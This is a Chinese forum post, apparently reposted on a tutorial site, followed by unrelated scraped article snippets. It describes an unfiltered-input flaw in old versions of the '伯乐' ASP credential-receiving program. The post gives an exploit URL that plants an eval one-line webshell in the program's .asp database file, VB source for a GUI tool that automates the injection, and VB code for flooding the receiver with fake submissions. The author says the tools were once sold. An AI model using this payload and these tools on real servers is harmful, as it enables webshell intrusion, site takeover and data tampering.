伯乐asp收信程序漏洞及利用程序利用代码_漏洞研究

http://forum.eviloctal.com/thread-32151-1-1.html 
之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧.. 
伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞) 
主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保.. 
mibao.asp文件对提交的参数没有任何过滤 

复制代码 代码如下:

if action="put" then  
sql="select * from mibao where u='"&request("u")&"'"  
set rs=Server.CreateObject("ADODB.RecordSet")  
rs.open sql,conn,1,3  
if rs.eof then  
rs.addnew  
rs("u")=request("u")  
rs("pos")=request("pos")  
rs("p")="等待破解"  
rs.update  
rs.close  

response.write "addok"  
else  
sql="update mibao set pos='"&request("pos")&"'"&" where u='"&request("u")&"'"  
conn.execute(sql)  
response.write "updateok"  
end if  
end if 

第一行代码处 

ConnStr="Provider = Microsoft.Jet.OLEDB.4.0;Data Source =" & Server.MapPath("mibaoaa.asp")提交的数据插进了mibaoaa.asp 
asp后缀的数据库文件..未做防下载处理..提交一句话木马..很容易得到webshell 

假设箱子地址是 
http://127.0.0.1/ 
就访问 
http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3 

返回 "addok"就说明插马成功 
接着 
http://127.0.0.1/mibaoaa.asp访问小马.. 
密码是ad.上传大马拿到webshell 

根据此漏洞我用VB写了一个简单的利用程序.. 
程序VB源码

复制代码 代码如下:

Private Sub Command1_Click() 
Inet1.OpenURL (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3") '用inet连接网页 
aa = InStr(Inet1.GetHeader, "404") '判断页头是否包含字符“404”,返回0则不包含,否则返回其位置 
If aa <> 0 Then '页头中包含404 
MsgBox "木马插入失败!", 48, "失败!" '则说明该网页不存在 
Else '如果页头中不包含“404” 
MsgBox "木马插入成功!", 64, "恭喜!" '说明网页存在 
Command2.Enabled = True 
End If 
End Sub 

Private Sub Command2_Click() 
If Text2.Text = Text1.Text + "/mibaoaa.asp" Then 
MsgBox "已经存在!请不要重复此操作!", 16, "error!" 
Else 
Text2.Text = Text1.Text + "/mibaoaa.asp" 
MsgBox "请使用一句话木马客户段连接!密码ad!", 64, "成功!" 
Text2.Visible = True 
End If 
End Sub 

Private Sub Command3_Click() 
End 
End Sub 

程序和动画演示我也一并打包上传了..教程因为是去年做的了..里面一些信息请各位兄弟看后不要再去尝试了..
教程里所写的联系QQ也不要再去加了..那时候因为混口饭吃..卖了几个程序..

现在全部都公开了.. BOLE.RAR (2.5 MB)

另外看到贴中有人提到刷信问题..lin.asp也是没怎么过滤的..可以外部提交数据

VB刷信代码

复制代码 代码如下:

Private Sub Command1_Click() 
Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) '用inet连接网页 
aa = InStr(Inet1.GetHeader, "404") '判断页头是否包含字符“404”,返回0则不包含,否则返回其位置 
If aa <> 0 Then '页头中包含404 
MsgBox "刷信失败!默认收信页面可能被改名!", 48, "失败!" '则说明该网页不存在 
Else '如果页头中不包含“404” 
MsgBox "刷信成功!请登陆后台查看!", 64, "恭喜!" '说明网页存在 
End If 
End Sub 

Private Sub Command2_Click() 
End 
End Sub

时间: 2024-10-30 09:16:34

伯乐asp收信程序漏洞及利用程序利用代码_漏洞研究的相关文章

asp.net 图标提取以及图标转换的实例代码_实用技巧

复制代码 代码如下: using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;using System.IO;using System.Resources;using System.Reflection;using System.Runtime.InteropServices; namespace newExtIcon{    public partial clas

asp.net动态获取Excel表名的函数代码_实用技巧

复制代码 代码如下: public string GetExcelFirstTableName(string excelFileName) { string tableName = null; if (File.Exists(excelFileName)) { using (OleDbConnection conn = new OleDbConnection("Provider=Microsoft.Jet." + "OLEDB.4.0;Extended Properties=

ASP中通过该日历算法实现的具体代码_应用技巧

复制代码 代码如下: <style> td { font-family: "宋体"; font-size:9pt} </style> <body bgcolor="eeeeee"> <table width="180" cellpadding="0" cellspacing="1" bgcolor="dddddd" align=center>

asp获取远程网页的指定内容的实现代码_小偷/采集

代码如下: 复制代码 代码如下: <% '用ASP获取远程目标网页指定内容,代码由广州网站建设http://www.jb51.net提供 On Error Resume Next Server.ScriptTimeOut=9999999 Function getHTTPPage(Path) t = GetBody(Path) getHTTPPage=BytesToBstr(t,"GB2312") End function Function Newstring(wstr,strng

小议yxbbs漏洞利用代码_漏洞研究

1.任意文件下载漏洞. 漏洞文件: ViewFile.asp Function ChkFile(FileName)  Dim Temp,FileType,F  ChkFile=false  FileType=Lcase(Split(FileName,".")(ubound(Split(FileName,"."))))  Temp="|asp|aspx|cgi|php|cdx|cer|asa|"  If Instr(Temp,"|&quo

A利用ASP小偷和Google实现在线翻译功能的代码_应用技巧

复制代码 代码如下: 有时候想为我们的网页提供多语言支持,如果一种语言用一张网页来做实在太麻烦了,幸好Google提供了语言工具功能,下面介绍如何利用它来实现网页多种语言之间的转换. lan.htm <form> <select name="lan"> <option value="en|de">英语 翻译成 德语</option> <option value="en|es">英语 翻译

asp.net 汉字转换拼音及首字母实现代码_实用技巧

Default.aspx页面 复制代码 代码如下: <%@ Page Language="C#" AutoEventWireup="true" CodeFile="Default.aspx.cs" Inherits="_Default" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:

漏洞漫舞的飞骋_漏洞研究

作者:玄猫[B.C.T]                                     网站:http://www.cnbct.org/&http://www.blackwoods.cn/   原件: http://www.cnbct.org/xuan1.doc   转载时,请注意版权,发于黑X2005年7期   一.前言.   初识飞骋似乎还是2002年,那时它推出了一个似乎叫飞骋邮局的东西,提供280M的空间(在当时算很大了),当时学SQL Injection的时候,曾用它练过手,

PJBlog存在SQL注入漏洞大家要快下补丁了_漏洞研究

    根据我们针对PJBlog进行的程序代码审计发现,PJBlog多个页面存在SQL注入漏洞,致使恶意用户可以利用注入漏洞拿到管理员帐号密码,并且进行恶意攻击. 我们强烈建议使用PJBlog的用户立刻检查一下您的系统是否受此漏洞影响,并紧密的关注PJBlog官方所发布的安全更新 官方补丁:        http://bbs.pjhome.net/thread-26090-1-1.html